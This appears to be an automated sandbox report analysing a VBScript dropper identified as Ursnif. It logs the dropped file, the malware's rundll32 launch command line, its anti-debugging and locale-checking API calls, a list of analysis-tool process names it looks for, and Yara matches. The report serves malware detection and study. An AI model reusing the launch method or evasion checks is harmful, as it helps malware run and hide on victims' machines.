Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70002116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70001E38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_70001E38
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70006707 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70006707

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: melange.yuv.0.dr Jump to dropped file

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 23_2_6FFA11BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70009925
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 23_2_7001234F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 23_2_70011BC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 23_2_70012524
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_70009E09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011E65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_70011F4B
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700022EB cpuid 23_2_700022EB
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 23_2_6FFA10ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 23_2_6FFA1F7C

Lowering of HIPS / PFW / Operating System Security Settings
barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 560537 Sample: gnAYDP69br2v.vbs Startdate: 26/01/2022 Architecture: WINDOWS Score: 100 20 Found malware configuration 2->20 22 Antivirus detection for dropped file 2->22 24 Yara detected  Ursnif 2->24 26 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->26 7 wscript.exe 2 2->7         started        11 WmiPrvSE.exe 2->11         started        process3 file4 18 C:\Users\user\AppData\Local\...\melange.yuv, PE32 7->18 dropped 28 Benign windows process drops PE files 7->28 30 VBScript performs obfuscated calls to suspicious functions 7->30 32 Deletes itself after installation 7->32 34 Creates processes via WMI 7->34 13 rundll32.exe 11->13         started        signatures5 process6 process7 15 rundll32.exe 13->15         started        signatures8 36 Found evasive API chain (may stop execution after checking system information) 15->36 38 Found API chain indicative of debugger detection 15->38
No contacted IP infos